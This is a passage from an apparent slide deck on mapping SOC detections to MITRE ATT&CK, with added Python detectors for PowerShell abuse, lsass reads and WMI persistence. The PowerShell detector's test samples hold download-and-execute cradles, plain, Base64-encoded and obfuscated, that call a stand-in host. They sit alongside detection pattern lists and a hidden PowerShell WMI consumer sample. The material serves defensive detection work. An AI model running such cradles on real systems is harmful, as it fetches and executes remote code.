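            if p["host"] != s["host"] or p["parent"].lower() != s["image"].lower():
                continue
            dt = (datetime.fromisoformat(p["time"]) - t0).total_seconds()
            if 0 <= dt <= window_s:
                findings.append({"host": s["host"], "service": s["service"],
                                 "service_image": s["image"], "child": p["image"],
                                 "seconds_after_install": dt})
    return findings


if __name__ == "__main__":
    for h in detect_lsass_access(PROCESS_ACCESS):
        print("lsass memory read by non-OS process:", h)
    for f in detect_remote_service_exec(SERVICE_INSTALL, PROCESS_CREATE):
        print("remote service install followed by child process:", f)
```

The interactive BackupAgent install is not raised because its session is a local logon, and the svchost.exe access to lsass is suppressed by the allowlist; only the behaviours in the TTP column survive to the analyst.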
  • 6. Tactics, Techniques and Procedures
    Tactic: the way the threat actor operates during the different steps of its operation/campaign. Tactics represent the "why" of an ATT&CK technique: the adversary's tactical objective, the reason for performing an action.
    Technique: the approach the threat actor uses to accomplish a tactic. Techniques represent "how" an adversary achieves a tactical objective by performing an action. For example, an adversary may dump credentials to achieve credential access.
    Procedure: the exact way a particular adversary or piece of software implements a technique. Procedures are described in the examples sections of ATT&CK techniques.
    Tactic (Why?) → Technique (How?) → Procedure (particular implementation)
  • 7. ATT&CK – Adversarial Tactics, Techniques and Common Knowledge
    https://attack.mitre.org/matrices/enterprise/ (matrix screenshot: tactics as columns, techniques as cells)
  • 9. The importance of Procedure
    For each technique many procedures can be introduced
    There are procedures that can't be detected due to technological limitations
    Not all procedures are yet known
  • 10. What do we detect? Procedure!
  • 11. Where can procedures be taken from? ATT&CK technique description!
  • 12. Good talks on the Internet
    https://offzone.moscow/speakers/teymur-heirhabarov/
    https://2017.zeronights.ru/report/hunting-for-credentials-dumping-in-windows-environment/
    https://www.slideshare.net/heirhabarov/kheirkhabarov24052017phdays7
  • 13. Examples of techniques and corresponding procedures. T1086: PowerShell
  • 14. Examples of techniques and corresponding procedures. T1086: PowerShell (statistics: ~45 000 PCs, last 30 days)
  • 15. Examples of techniques and corresponding procedures. T1086: PowerShell. PowerShell in autorun
  • 16. Examples of techniques and corresponding procedures. T1086: PowerShell. PowerShell in autorun
  • 17. Examples of techniques and corresponding procedures. T1086: PowerShell. PowerShell suspicious command lines (before adaptation / after adaptation)
  • 18. Examples of techniques and corresponding procedures. T1086: PowerShell. PowerShell download cradles
    https://gist.github.com/HarmJ0y/bb48307ffa663256e239#file-downloadcradles-ps1
  • 19. Examples of techniques and corresponding procedures. T1086: PowerShell. PowerShell download cradles
  • 20. Examples of techniques and corresponding procedures. T1086: PowerShell. PowerShell obfuscation
    https://github.com/danielbohannon/Invoke-Obfuscation
  • 21. Examples of techniques and corresponding procedures. T1086: PowerShell. PowerShell obfuscation
  • 22. Examples of techniques and corresponding procedures. T1086: PowerShell. PowerShell Base64 encoding
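Slides 17 to 22 list the PowerShell procedures a SOC actually hunts for: suspicious command-line switches, download cradles, obfuscation and Base64-encoded commands, each tuned "before adaptation / after adaptation" to a customer's legitimate tooling. As an added example (not code from the deck or from the authors), the Python below triages constructed command lines for all four: it decodes the -EncodedCommand payload so the cradle hidden inside can be inspected, applies pattern checks for cradles, switches and obfuscation tricks of the Invoke-Obfuscation kind, and suppresses hits that match a known-good allowlist, which is what the adaptation step amounts to. The switch spellings covered, the heuristics, the allowlist path and all sample command lines are assumptions made for the example.

```python
"""PowerShell command-line triage for the T1086 procedures (added example).

Decodes -EncodedCommand payloads, flags download cradles, suspicious launch
switches and common obfuscation tricks, and applies a known-good allowlist
that models the "before adaptation / after adaptation" tuning step.
All command lines are constructed samples.
"""
import base64
import re

# Launch switches that are rare in interactive admin use.
SUSPICIOUS_SWITCHES = [
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no-profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("non-interactive", re.compile(r"-noni(?:nteractive)?\b", re.I)),
    ("exec-policy-bypass", re.compile(r"-(?:ep|exec(?:utionpolicy)?)\s+bypass", re.I)),
]
# Download-cradle building blocks (the families in the gist linked on slide 18).
CRADLE = [re.compile(p, re.I) for p in (
    r"Net\.WebClient", r"DownloadString", r"DownloadFile", r"Invoke-WebRequest",
    r"\biwr\b", r"Invoke-RestMethod", r"Start-BitsTransfer", r"\bcurl\b", r"\bwget\b")]
EXEC = [re.compile(p, re.I) for p in (r"\bIEX\b", r"Invoke-Expression")]
# Obfuscation patterns of the kind Invoke-Obfuscation (slide 20) produces.
OBFUSCATION = [
    ("string-concat", re.compile(r"'\s*\+\s*'")),
    ("format-operator", re.compile(r"\{\d+\}[^\"']*[\"']\s*-f\s", re.I)),
    ("char-casting", re.compile(r"\[char\]", re.I)),
    ("call-operator-string", re.compile(r"&\s*\(\s*['\"]")),
    ("backtick-escapes", re.compile(r"(?:`[a-z].*){3,}", re.I)),
]
# Common spellings of the encoded-command switch; the payload is UTF-16LE base64.
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# "After adaptation": command lines known to be legitimate in this (constructed)
# environment are suppressed instead of being raised to an analyst.
KNOWN_GOOD = [re.compile(r'-File\s+"C:\\Program Files\\Corp\\Inventory\\[^"]+\.ps1"', re.I)]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline, allowlist=KNOWN_GOOD):
    """Return the indicators found in the command line and its decoded payload."""
    indicators = []

    def add(name):
        if name not in indicators:
            indicators.append(name)

    for name, rx in SUSPICIOUS_SWITCHES:
        if rx.search(cmdline):
            add(name)
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        add("encoded-command")
    for text in (cmdline, decoded or ""):  # check the visible and the decoded text
        if any(rx.search(text) for rx in CRADLE):
            add("download-cradle")
        if any(rx.search(text) for rx in EXEC):
            add("invoke-expression")
        for name, rx in OBFUSCATION:
            if rx.search(text):
                add(name)
    suppressed = any(rx.search(cmdline) for rx in allowlist)
    return {"indicators": indicators, "decoded": decoded, "suppressed": suppressed}


# Constructed samples. The encoded one is built here so its base64 is correct.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLES = {
    "benign": "powershell.exe Get-Process | Sort-Object CPU",
    "inventory": r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Program Files\Corp\Inventory\collect.ps1"',
    "encoded": "powershell.exe -nop -w hidden -enc "
               + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode(),
    "obfuscated": "powershell.exe -w hidden -c \"&('I'+'EX') ((New-Object ('Net.'+'WebC'+'lient'))"
                  ".('Down'+'loadString').Invoke('http://example.invalid/p'))\"",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(label, analyze(cmd))
```

Note that the obfuscated sample is not caught by the cradle patterns at all, only by the concatenation and call-operator heuristics: that is the point of slides 20 and 21, and why command-line detects need both the literal procedure signatures and the obfuscation indicators. The inventory script trips two switch checks but is suppressed by the allowlist, which is the "after adaptation" view on slide 17.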
  • 23. Examples of techniques and corresponding procedures. T1084: Windows Management Instrumentation Event Subscription
  • 24. Examples of techniques and corresponding procedures. T1084: Windows Management Instrumentation Event Subscription
    Enumeration of installed ActiveScript consumers (before adaptation / after adaptation; ~146 000 PCs, 1 year period)
    Enumeration of installed CommandLine consumers (before adaptation / after adaptation)
  • 25. Examples of techniques and corresponding procedures. T1084: Windows Management Instrumentation Event Subscription. Malicious CommandLine event consumer
  • 26. Examples of techniques and corresponding procedures. T1084: Windows Management Instrumentation Event Subscription. Malicious ActiveScript event consumer
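Slides 23 to 26 hunt T1084 by enumerating CommandLine and ActiveScript event consumers and then adapting the result to what is normal in the fleet. As an added example (not code from the deck or from the authors), the Python below does the same over WMI telemetry: it takes filter, consumer and binding records laid out the way Sysmon reports WMI activity (events 19, 20 and 21), joins consumer to filter through the binding, raises consumers that execute a command line or script, rates a bound consumer higher than an unbound one, and drops consumers on a known-good list. The record layout, the type strings, the allowlist and all sample records are constructed assumptions for the example.

```python
"""Hunting WMI event-subscription persistence (T1084) in WMI telemetry.

Added example. The records are constructed to follow the layout Sysmon uses
for WMI filters, consumers and filter-to-consumer bindings. A consumer that
runs a command line or a script is what the slides call a CommandLine or
ActiveScript event consumer: bound to a filter it is live persistence,
unbound it is still worth a look. The allowlist models the "after adaptation"
step for bindings that ship with the OS.
"""
import re

EXECUTING_TYPES = {"Command Line", "Script"}
# Consumers present on a default Windows install (constructed allowlist).
KNOWN_GOOD_CONSUMERS = {"SCM Event Log Consumer"}

# Binding records name the two ends as WMI object paths such as
# CommandLineEventConsumer.Name="Updater"; pull the Name out of that.
_NAME_IN_PATH = re.compile(r'Name="([^"]+)"')


def ref_name(path):
    m = _NAME_IN_PATH.search(path)
    return m.group(1) if m else path


def hunt_wmi_persistence(events, allow=KNOWN_GOOD_CONSUMERS):
    """Return one finding per executing consumer (and per filter it is bound to)."""
    filters = {e["Name"]: e for e in events if e["EventType"] == "WmiFilterEvent"}
    consumers = {e["Name"]: e for e in events if e["EventType"] == "WmiConsumerEvent"}
    bound_filters = {}
    for e in events:
        if e["EventType"] == "WmiBindingEvent":
            bound_filters.setdefault(ref_name(e["Consumer"]), []).append(ref_name(e["Filter"]))
    findings = []
    for name, c in consumers.items():
        if c["Type"] not in EXECUTING_TYPES or name in allow:
            continue
        for f in bound_filters.get(name) or [None]:  # None = consumer not bound yet
            findings.append({
                "consumer": name, "type": c["Type"], "destination": c["Destination"],
                "user": c["User"], "filter": f,
                "query": filters[f]["Query"] if f in filters else None,
                "severity": "high" if f else "medium",
            })
    return findings


# Constructed sample telemetry: one malicious CommandLine consumer bound to an
# uptime-triggered filter, the default SCM binding, and an unbound script consumer.
WMI_EVENTS = [
    {"EventType": "WmiFilterEvent", "Operation": "Created", "User": "SRV01\\admin",
     "Name": "Updater", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"EventType": "WmiConsumerEvent", "Operation": "Created", "User": "SRV01\\admin",
     "Name": "Updater", "Type": "Command Line",
     "Destination": r"powershell.exe -nop -w hidden -File C:\Users\Public\u.ps1"},
    {"EventType": "WmiBindingEvent", "Operation": "Created", "User": "SRV01\\admin",
     "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="Updater"'},
    {"EventType": "WmiConsumerEvent", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Name": "SCM Event Log Consumer", "Type": "Event Log", "Destination": ""},
    {"EventType": "WmiBindingEvent", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
    {"EventType": "WmiConsumerEvent", "Operation": "Created", "User": "SRV01\\admin",
     "Name": "Cleanup", "Type": "Script",
     "Destination": "VBScript (script text omitted in this constructed sample)"},
]

if __name__ == "__main__":
    for f in hunt_wmi_persistence(WMI_EVENTS):
        print(f["severity"], f["consumer"], f["type"], "->", f["destination"])
```

Carrying the filter query into the finding matters for triage: a consumer bound to a filter that fires a few minutes after boot, as in the sample, is the persistence pattern from slide 25, while the same consumer bound to a one-off filter is much less interesting.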
  • 27. Use case #1: Detects development
    ATT&CK is one of the good sources of detect ideas
    Workflow: attack emulation; analysis of detection capabilities; required processing; required telemetry; detect development, testing, publication; endless testing in operations; metrics
  • 28. Other sources of detect ideas – TI from operations
    Public: Twitter, blogs, talks, etc.; tests*
    Private: internal threat research; operations practice; threat hunting**; DFIRMA***; security assessment / red teaming
    * https://attackevals.mitre.org/evaluations.html , for example
    ** the practice of searching iteratively through data to detect [advanced] threats that evade automatic security solutions
    *** Digital forensics, Incident response, Malware analysis
  • 29. Use case #1': Detects development priorities (post-breach)
    Tactics priorities: Persistence; Privilege escalation; Defense evasion; Credential access; Lateral movement; Execution; …
    Techniques priorities: available telemetry; used by which APT actors, and how relevant they are to you; required investments (~ risk assessment)
  • 30. Use case #2: Detects classification
    Detects management
    Understand current coverage: what do we have for each technique*? gap analysis
    Extend coverage: add new detects? update existing ones?
    Simplifies R&D team work
    * Through the appropriate procedure
  • 31. Detects ("Hunts") mapped to MITRE techniques (screenshot)
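Slides 29 to 31 describe the bookkeeping behind detect management: every detect is mapped to the technique whose procedure it covers, coverage is read per technique and per tactic, and the gaps are worked in the post-breach tactic order of slide 29. As an added example (not code from the deck or from the authors), the Python below does that roll-up for a small catalogue. The technique-to-tactic table is a constructed subset using the pre-2020 ATT&CK IDs the deck uses (T1086, T1084 and a few others), and the detect catalogue is made up; the priority numbers simply follow the order on slide 29.

```python
"""ATT&CK coverage and gap analysis for a detect catalogue (added example).

Each detect is mapped to the technique whose procedure it covers (slide 30);
coverage is rolled up per tactic and uncovered techniques are ranked with the
post-breach tactic priorities from slide 29. The technique-to-tactic table is
a constructed subset using the pre-2020 ATT&CK IDs; the detects are made up.
"""
from collections import defaultdict

# Slide 29 order: lower number = higher priority.
TACTIC_PRIORITY = {
    "Persistence": 1, "Privilege Escalation": 2, "Defense Evasion": 3,
    "Credential Access": 4, "Lateral Movement": 5, "Execution": 6,
    "Command and Control": 7,
}

# technique id -> (name, tactics it appears under in the 2019 Enterprise matrix)
TECHNIQUES = {
    "T1086": ("PowerShell", ["Execution"]),
    "T1084": ("Windows Management Instrumentation Event Subscription", ["Persistence"]),
    "T1003": ("Credential Dumping", ["Credential Access"]),
    "T1035": ("Service Execution", ["Execution"]),
    "T1055": ("Process Injection", ["Defense Evasion", "Privilege Escalation"]),
    "T1027": ("Obfuscated Files or Information", ["Defense Evasion"]),
    "T1105": ("Remote File Copy", ["Command and Control", "Lateral Movement"]),
}

# Constructed detect catalogue: name, covered technique, the procedure it
# actually catches and the telemetry it needs (slide 27's "required telemetry").
DETECTS = [
    {"name": "PowerShell download cradle", "technique": "T1086",
     "procedure": "download cradle in command line", "telemetry": "process creation"},
    {"name": "PowerShell encoded command", "technique": "T1086",
     "procedure": "-EncodedCommand payload", "telemetry": "process creation"},
    {"name": "WMI CommandLine consumer created", "technique": "T1084",
     "procedure": "CommandLineEventConsumer binding", "telemetry": "WMI activity"},
    {"name": "Non-OS process reads lsass", "technique": "T1003",
     "procedure": "lsass memory read", "telemetry": "process access"},
    {"name": "Remote service install then child process", "technique": "T1035",
     "procedure": "network-logon service install", "telemetry": "service install + process creation"},
]


def coverage_by_technique(detects, techniques=TECHNIQUES):
    """Map every technique to the names of the detects that cover it."""
    cov = {tid: [] for tid in techniques}
    for d in detects:
        cov.setdefault(d["technique"], []).append(d["name"])
    return cov


def tactic_coverage(detects, techniques=TECHNIQUES):
    """Per tactic: (techniques with at least one detect, techniques in total)."""
    cov = coverage_by_technique(detects, techniques)
    covered, total = defaultdict(int), defaultdict(int)
    for tid, (_, tactics) in techniques.items():
        for t in tactics:
            total[t] += 1
            if cov[tid]:
                covered[t] += 1
    return {t: (covered[t], total[t]) for t in total}


def ranked_gaps(detects, techniques=TECHNIQUES, priority=TACTIC_PRIORITY):
    """Uncovered techniques, most urgent tactic first (slide 29 priorities).
    A technique under several tactics takes the best priority among them."""
    cov = coverage_by_technique(detects, techniques)
    gaps = []
    for tid, (name, tactics) in techniques.items():
        if cov[tid]:
            continue
        best = min(priority.get(t, len(priority) + 1) for t in tactics)
        gaps.append((best, tid, name))
    gaps.sort()
    return [(tid, name, best) for best, tid, name in gaps]


if __name__ == "__main__":
    for t, (c, n) in tactic_coverage(DETECTS).items():
        print(f"{t:22s} {c}/{n}")
    for tid, name, prio in ranked_gaps(DETECTS):
        print(f"gap (priority {prio}): {tid} {name}")
```

Counting detects per technique rather than a yes/no flag keeps slide 9 in view: two PowerShell detects cover two procedures of T1086, not the technique as a whole, so the per-technique list is the thing to review when deciding between "add new detects" and "update existing ones".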
  • 32. Use case #3: SOC analyst's body of knowledge
    Attack kill chain (tactics)
    Descriptions of the attack techniques known so far
    Public reports about actual APT campaigns, linked to the techniques used
    Recommendations on detection and mitigation
    In addition: OS architecture; the known attacker toolset; not hypothetical attacks, but ones taken from practice*
    * https://reply-to-all.blogspot.com/2013/01/blog-post.html
  • 33. Use case #4: detect rate assessment by ATT&CK coverage
    Choose a scenario (a sequence of particular procedures)*
    Execute it in the lab and see the detects
    Evaluate based on detection types**: telemetry; enrichment; behavior detect
    Now results can be compared***
    Whether the techniques can be considered covered based on the test is an open question: it depends on the actual procedures used in the test
    * https://attackevals.mitre.org/
    ** https://attackevals.mitre.org/methodology/detection-categorization.html
    *** https://reply-to-all.blogspot.com/2018/12/mitre-edr.html
  • 34. MITRE ATT&CK Evaluations
    Particular procedures: APT3: 56 Enterprise techniques across 10 tactics; "Living off the land"*; focus on "Primary" techniques**, on behavior and not on tools and IoCs
    2 scenarios: 10-step with Cobalt Strike + 10-step with Empire***
    Same lab environment for all vendors
    Detection categorization. Main detection types: None; Telemetry; Indicator of Compromise; Enrichment; General behavior; Specific behavior. Modifiers: Delayed; Tainted; Configuration change
    * https://www.youtube.com/watch?v=j-r6UonEkUw
    ** Differentiate "Primary" and "Enabling" techniques. "Enabling": many of the techniques required Command-Line Interface, Execution through API, and PowerShell. In the assessment MITRE focused on the Primary technique that was performed, rather than on the mechanism of execution (which was considered the Enabling technique)
    *** https://www.cobaltstrike.com/ ; https://github.com/EmpireProject/Empire
  • 35. BAS: Breach and Attack Simulation
    METTA https://github.com/uber-common/metta
    Caldera https://github.com/mitre/caldera
    Unfetter https://mitre.github.io/unfetter/
    Endgame RTA https://github.com/endgameinc/RTA
    Red Canary Atomic Red Team https://github.com/redcanaryco/atomic-red-team
    Microsoft Invoke-Adversary https://blogs.technet.microsoft.com/motiba/2018/04/09/invoke-adversary-simulating-adversary-operations/
  • 36. KaLaBAS?
    Existing tools are vendor-specific
    Not enough tests
    Need to integrate into the existing auto-testing infrastructure
  • 37. Use case #5: Adversary emulation, red teaming
    Common framework for Red team, Blue team and Purple team collaboration
    Create adversary emulation scenarios: choose relevant TTPs
    Create the red team plan: choose TTPs that might be missed by the existing Blue team
    Gap analysis of current defensive technologies; prioritize future investments
    SOC operational efficiency (maturity) assessment